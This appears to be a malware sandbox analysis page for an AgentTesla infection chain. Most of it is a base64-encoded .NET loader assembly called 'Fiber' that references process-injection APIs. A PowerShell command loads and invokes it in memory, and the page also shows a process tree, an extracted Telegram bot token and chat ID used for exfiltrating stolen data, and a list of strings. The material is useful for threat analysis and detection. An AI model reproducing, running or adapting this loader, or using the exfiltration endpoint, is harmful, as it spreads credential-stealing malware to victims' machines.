kw0JIP8AAABfBiUXWAphHmIJHmMGJRdYCmHSYNGdGCu0CBdYDBkrrSvKB3NRAAAKKFIAAAoqHgIoUwAACioAAABCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADwCwAAI34AAFwMAAAkCwAAI1N0cmluZ3MAAAAAgBcAAAwFAAAjVVMAjBwAABAAAAAjR1VJRAAAAJwcAAB0BAAAI0Jsb2IAAAAAAAAAAgAAAVedAhwJDwAAAPoBMwAWAAABAAAARAAAABIAAAAhAAAALQAAADIAAABjAAAAAQAAAC0AAAACAAAACAAAAAIAAAAMAAAACgAAAAEAAAADAAAAAQAAAAQAAAADAAAAAgAAAAAAWgUBAAAAAAAGAPcB+AcGAEcHvAcKAE0CJAUKACoCJAUOAJIJqwUGACYH+AcOANYFqwUOAEUJaAgOADcAqwUOANoBqwUOAIcBqwUOAHsHqwUGAAEA+gQOAP4GiAgOAKsGSwYOAKwKgQYKAAcCNgYKABICNgYOAAgE8AoOAOMEqwUKAGQJqQcOAPIEIggOAKIHqwUOAJMGqwUOACsHqwUOAGwAqwUOAC8EqwUOAPMGqwUOAFkKqwUGALAAQQgOAM0BqwUKAMoJqwkOAJ4E7wkGAB0JQQgGANYIygAOANQJqwUGAGAGygAGAIsEQQgGAFQJQQgOAPYIqwUOAKQFkgAOAJ4FkgAOANoGXwoOALIFXwoOAMUFXwoOAJEFXwoOAFkBXwoKAIMFAgYKAGoBAgYOAN4FqwUOAA4HqwUOACUEqwUOAH0DaAgOAOoDaAgOAHoCgQYOAFIDgQYOANEDgQYOAJ0DgQYOALYDgQYOAMECgQYOAGYCIggOAD8CIggOAAUDgQYOANwCpwQGAJECQQgGAKkCygAGADcDygAOACIDgQYAAAAAewAAAAAAAQABAAAAAAAoBkIKBQABAAIAAAAAAEUHQgoJAAEAAwAAARAAmQlCChUAAQAEAAABAACiCJkIFQAFAAkAAAEQAOsIQgpFAAcADAAAAQAADgtCChUACAAPAAEAAAAXCdQGFQAIABAAAQAAAMgB1AYVAAgAHQABAQAA6gTUBhUACAAfAAEAAADEBtQGFQAIACAABQEAAOoHAAAVAAgAIQAFAQAAEAAAABUACAAoAAsBAAC/AAAAfQAJACoACwEAAIQAAAB9AA0AKgAAAAAAvwAAABUAHwAqAAAAAACEAAAAFQAhACwAAAEAAG8DAADRACEALQAxAL8ASwIxAL8AUwIxAL8AWwIxAL8AYwIRAL8AawIRAL8AbwIRAL8AcwIhAL8AXAAGAKsBoQAGAHoBoQAGAOkAdwIGAOAAdwIGAKoAdwIGACsAhgAGALwGhgAGALkBhgAGAKIAegIGAKYAegIGAGsEegIGAHMEegIGACkJegIGADcJegIGAPUCegIGAM4IegIGACcKfQIGAD0AfQIGAD8AoQAGANwJoQAGAOUJoQAGAFAHoQARAL8AgAIRAIQAhAJWgPoFhgBQIAAAAAARGIsH1gABAFcgAAAAAAYYhQcBAAEAXyAAAAAABhiFBwEAAQBoIAAAAAARGIsH1gABAL0gAAAAABMIOAeIAgEAySAAAAAAEwgYBo0CAQDVIAAAAAATCCIHkgIBAOEgAAAAABMI2geXAgEA7SAAAAAAEwj6BpwCAQArIQAAAAATCN8BoQIBADIhAAAAABMI6wGmAgEAOiEAAAAAERiLB9YAAgBQIQAAAAAGGIUHAQACAFghAAAAABYIvgmsAgIAXyEAAAAAEwjeCKwCAgBmIQAAAAAGGIUHAQACAAAAAACAABFgvwCxAgIAAAAAAIAAEWC/AMMCDAAAAAAAgAARYIQAwwIOAAAAAACAABFgyADDAhAAAAAAAIAAEWCGAMMCEgAAAAAAgAARYL8AygIUAAAAAACAABFgvwDVAhkAAAAAAIAAEWC/AOACHgAAAAAAgAARYL8A5gIgAAAAAACAABFgvwDvAiUAcCEAAAAAFgBIAfQCJgDEIQAAAAARAL8A+gInAAAmAAAAAAYYhQcBACsACCYAAAAAFgCOAAMDKwCsJwAAAAAWAMwG1gAsAMwpAAAAAAYYhQcBACwA1CkAAAAAxgIQCTEALADiKQAAAADGAk0BNgAtAOopAAAAAIMA1wEIAy0A9ikAAAAAxgLhBEEALQAAKgAAAAARAL8ADQMtACYqAAAAAAEAvwAVAy4ALyoAAAAABhiFBwEALwA4KgAAAAADCDgBJwAvAHcqAAAAAAYYhQcBAC8AkCoAAAAAEQC/AB0DLwCHKwAAAAATAIQA1gAxAKArAAAIABMAvwAmAzEAGSwAAAAABhiFBwEAMwAAAAEAUQQAAAEAvwAAAAIAhAAAAAMAyAAAAAQAhgAAAAUA3gAAAAYAiAAAAAcAHwEAAAgAigAAAAkAggQAAAoAjAAAAAEAvwAAAAIAhAAAAAEAvwAAAAIAhAAAAAEAvwAAAAIAhAAAAAEAvwAAAAIAhAAAAAEAvwAAAAIAhAAAAAMAyAAAAAQAhgAAAAUA3gAAAAEAvwAAAAIAhAAAAAMAyAAAAAQAhgAAAAUA3gAAAAEAvwAAAAIAhAAAAAEAvwAAAAIAhAAAAAMAyAAAAAQAhgAAAAUA3gAAAAEAvwAAAAEAvAAAAAEAvwAAAAIAhAAAAAMAyAAAAAQAhgAAAAEAnAAAAAEAugYAAAEAvwAAAAEAvwAAAAEAAAAAAAIAAAAAAAEAAAAAAAIAAAAJAIUHAQAZAIUHBQARAIUHAQAMAIUHAQAUAIUHAQAcAIUHAQAkAIUHAQAMADgBJwAUADgBJwAcADgBJwAkADgBJwBBAEgELAApABAJMQApAE0BNgBRAJkBOgApAOEEQQBhACkBSAApAIUHAQA8AL8AXAA0ADQEJwBpADQEJwA0AD4EZwBpAD4EZwA0AIUHAQBpAIUHAQApAAcJbQBRAHwKcwBxAIUHeACRABQBfwCJAIUHAQCZAIUHAQChAAgLhgChAHMJiQCxAIQEjwChAAALlQChAGwJmgC5ALcGoQDBAIUHAQDJADUApAC5AHsEqwDJAGoArwDhALUKtgDJAMUIwQDxAGsHygCpAPMA0ACpAGQFAQDxAFkH1gABAYUHAQAJAXIA2gABAZoE4AARAeEE5wAZAR8C7AChACEB8QChAOEEQQABAdIE9wAhAcEE/AApAXoJAgExAaMJCAE5AYcJGQExAbYJHwExAToFMQGBAKAKQwGBAGkFSAFZAYUHAQDJAMUITwFhAZIHVQFxAYUHXwGBAYUHbAFRAYUHAQBJAaQGdgFRAUsKfQGBAA8BggGBAKwIiQFBAYkKcwBBAb8BQQChAOQKkQGRAegFlwGZAYUHnQGRAVcEowGhAFMKqgGhAIUHsgGhAJ0G7AChAYUHAQCpAYUHuAGxAYUHAQC5AYUHvQHBAYUHvQHJAYUHvQHRAYUHvQHZAYUHvQHhAYUHvQHpAYUHwgHxAYUHvQH5AYUHvQEBAoUHvQEJAoUHAQARAoUHAQAZAoUHxwEhAoUHAQAOAIQAOgIuAKMCLAMuAKsCNQMuALMCVAMuALsCVAMuAMMCVAMuAMsCVAMuANMCVAMuANsCVAMuAOMCVAMuAOsCWgMuAPMChAMuAPsCkQMuAGoB2wNDABMA4ANgABMA4ANjABMA4AODAAMD2wODAAsD2wOjAAMD2wOjAAsD2wPDABMA6QPjAAMD2wPjAAsD2wNDAQMD2wODARMA4AODARMD8gOjARMA4AOjAeMCVAMgAvsA2wNAAvsA2wNDAhsDVARgAvsA2wOAAvsA2wOgAvsA2wPAAvsA2wPgAvsA2wMAA/sA2wMgA/sA2wNAA/sA2wMgBBMA4ANABBMA4ANgBBMA4AOABBMA4APgBBMA4AMgBRMA4AMBAAAAAAAOAAEAAAAAAA8AzwHVAfYB/AECAgwCFgIgAkMFUAULABIAGQAgAEUATgBVAGQAxwAuAY4BrwEEASMAXgkBAAABJQAACgEAAAEnAPsJAQAAASkAFgoBAAABKwARCgEAAAEtAL8KAQAAAS8A0QoBAAABMQBsBgIAAAEzADMKAQAAATUAAgEBAASAAAABAAAAAAAAAAAAAAAAANQGAAAKAAAAAAAAAAAAAAAoAsoAAAAAAAQAAAAAAAAAAAAAADECqwUAAAAABAAAAAAAAAAAAAAAMQLBAAAAAAAAAAAAAgAAAEkAAAAMAAQADQAEAA4ACAAPAAgAAAAQABoAvwAAABAASwC/AAAAAABNAL8AIwAHAiMAEQIAAABDb250ZXh0VmFsdWVgMQBUaHJlYWRTYWZlT2JqZWN0UHJvdmlkZXJgMQBSZXNlcnZlZDEAVG9JbnQzMgBjYlJlc2VydmVkMgAyYTQxZmRlOTQ3Yzc0ZWQ0OWM4ZDhkZjVmMjg2YzhhMwBUb0ludDE2AGdldF9VVEY4ADxNb2R1bGU+AEEAQgBDAEQARQBWQUkAU3lzdGVtLklPAFFCWHRYAGR3WABkd1kAU2l6ZV8AUHJvamVjdERhdGEAZGF0YQBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAVGhyZWFkSWQAUHJvY2Vzc0lkAEdldFByb2Nlc3NCeUlkAFJlc3VtZVRocmVhZABMb2FkAFN5bmNocm9uaXplZABSZXBsYWNlAENyZWF0ZUluc3RhbmNlAGdldF9HZXRJbnN0YW5jZQBBbmRlAEdldEhhc2hDb2RlAENyeXB0b1N0cmVhbU1vZGUAQ29tcHJlc3Npb25Nb2RlAFRocmVhZEhhbmRsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBQcm9jZXNzSGFuZGxlAFRpdGxlAGdldF9OYW1lAEhvbWUAVmFsdWVUeXBlAEdldFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBkd0ZpbGxBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBPYmZ1c2NhdGlvbkF0dHJpYnV0ZQBNeUdyb3VwQ29sbGVjdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFlhbm9BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFN1cHByZXNzVW5tYW5hZ2VkQ29kZVNlY3VyaXR5QXR0cmlidXRlAEJ5dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBhZGRfUmVzb3VyY2VSZXNvbHZlAGR3WFNpemUAZHdZU2l6ZQBnZXRfU2l6ZQBTaXplT2YATmV3TGF0ZUJpbmRpbmcAc2V0X0VuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBEb3dubG9hZFN0cmluZwBUb1N0cmluZwBPcHRpY2FsAE1hcnNoYWwATWljcm9zb2Z0LlZpc3VhbEJhc2ljLk15U2VydmljZXMuSW50ZXJuYWwAU3lzdGVtLkNvbXBvbmVudE1vZGVsAExhdGVDYWxsAGtlcm5lbDMyLmRsbABudGRsbC5kbGwARmliZXIuZGxsAEtpbGwAR2V0TWFuaWZlc3RSZXNvdXJjZVN0cmVhbQBEZWZsYXRlU3RyZWFtAENyeXB0b1N0cmVhbQBNZW1vcnlTdHJlYW0AU3lzdGVtAFN5bW1ldHJpY0FsZ29yaXRobQBJQ3J5cHRvVHJhbnNmb3JtAEJvb2xlYW4AQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAFZlcnNpb24AU3lzdGVtLklPLkNvbXByZXNzaW9uAGdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAE50VW5tYXBWaWV3T2ZTZWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBJbnRlcm4AQ29weVRvAEN1bHR1cmVJbmZvAFplcm8ARGVza3RvcABTdGFydHVwAHN0YXJ0dXAARmliZXIAREVTQ3J5cHRvU2VydmljZVByb3ZpZGVyAEJ1ZmZlcgBnZXRfUmVzb3VyY2VNYW5hZ2VyAFJlc29sdmVFdmVudEhhbmRsZXIAZ2V0X1VzZXIAQml0Q29udmVydGVyAGdldF9Db21wdXRlcgBNeUNvbXB1dGVyAFN0ZEVycm9yAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAENyZWF0ZURlY3J5cHRvcgBJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5EZXZpY2VzAGdldF9XZWJTZXJ2aWNlcwBNeVdlYlNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5BcHBsaWNhdGlvblNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SZXNvdXJjZXMARmliZXIuTXkuUmVzb3VyY2VzAEdldE1hbmlmZXN0UmVzb3VyY2VOYW1lcwBHZXRCeXRlcwBkd0ZsYWdzAFN0cmluZ3MAZ2V0X1NldHRpbmdzAE15U2V0dGluZ3MAUmVzb2x2ZUV2ZW50QXJncwBSZWZlcmVuY2VFcXVhbHMAVG9vbHMAQ29udmVyc2lvbnMAZHdYQ291bnRDaGFycwBkd1lDb3VudENoYXJzAFJ1bnRpbWVIZWxwZXJzAE9wZXJhdG9ycwBDcmVhdGVQcm9jZXNzAENvbmNhdABGb3JtYXQAQ3JlYXRlT2JqZWN0AENvbmNhdGVuYXRlT2JqZWN0AE15UHJvamVjdABMYXRlR2V0AFN5c3RlbS5OZXQATGF0ZVNldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTdGRJbnB1dABTdGRPdXRwdXQAU3lzdGVtLlRleHQAV293NjRHZXRUaHJlYWRDb250ZXh0AFdvdzY0U2V0VGhyZWFkQ29udGV4dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABGaWJlci5NeQBUb0FycmF5AFRvQ2hhckFycmF5AFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkAZ2V0X0Fzc2VtYmx5AGdldF9SZXF1ZXN0aW5nQXNzZW1ibHkAR2V0RXhlY3V0aW5nQXNzZW1ibHkAQmxvY2tDb3B5AFJlYWRQcm9jZXNzTWVtb3J5AFdyaXRlUHJvY2Vzc01lbW9yeQBvcF9FcXVhbGl0eQBTeXN0ZW0uU2VjdXJpdHkASXNOdWxsT3JFbXB0eQBNeVNldHRpbmdzUHJvcGVydHkAAAAAAB/rqu2H75Lxl/OG9dj3qvmf+4/9kf91AXADZwVjB3sBc+qo7Nfus/Cm8pr0m/aT+Jb6jPyO/qMATAJqBGYGdQhmCngMYg5pEGUSPRRbFlIYTRpHHFsebSBAIk4kQCZQKEYqWSxGLnMwRzIHNBs2BzgXOgg8DT4MQHBCekQZRhVILEosTB5OOVAyUiBUe1YyWCFaPgEL58rpkevc7ZPv0gED5scBC+nC6xTtxe/Y8dgBA+mIAQ3lm8J56RDrxO2T79EBA+aEAQvCXukSFBHtk+/EAQPlggEL6sPJ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AGwAAAAiAAEAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAwAAACQPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.lpø☀☞√�}П�gva4*●*☞#:▶67.05.45.484*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝'))C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2068"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Services Installation Utility
Version:
4.7.2558.0 built by: NET471REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
AgentTesla
(PID) Process(2068) RegSvcs.exe
Protocoltelegram
Urlhttps://api.telegram.org/bot1977970812:AAHd8pA2REAwdAB_6eJ-9nZj90oz8OYGjrI/sendDocument
ChatId1972606022
Strings (790)
60
yyyy-MM-dd HH:mm:ss
yyyy_MM_dd_HH_mm_ss
<br>
<hr>
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
AES
Microsoft Primitive Provider
CONNECTION
KEEP-ALIVE
PROXY-AUTHENTICATE
PROXY-AUTHORIZATION
TE
TRAILER
TRANSFER-ENCODING
UPGRADE
%startupfolder%
\%insfolder%\%insname%
/
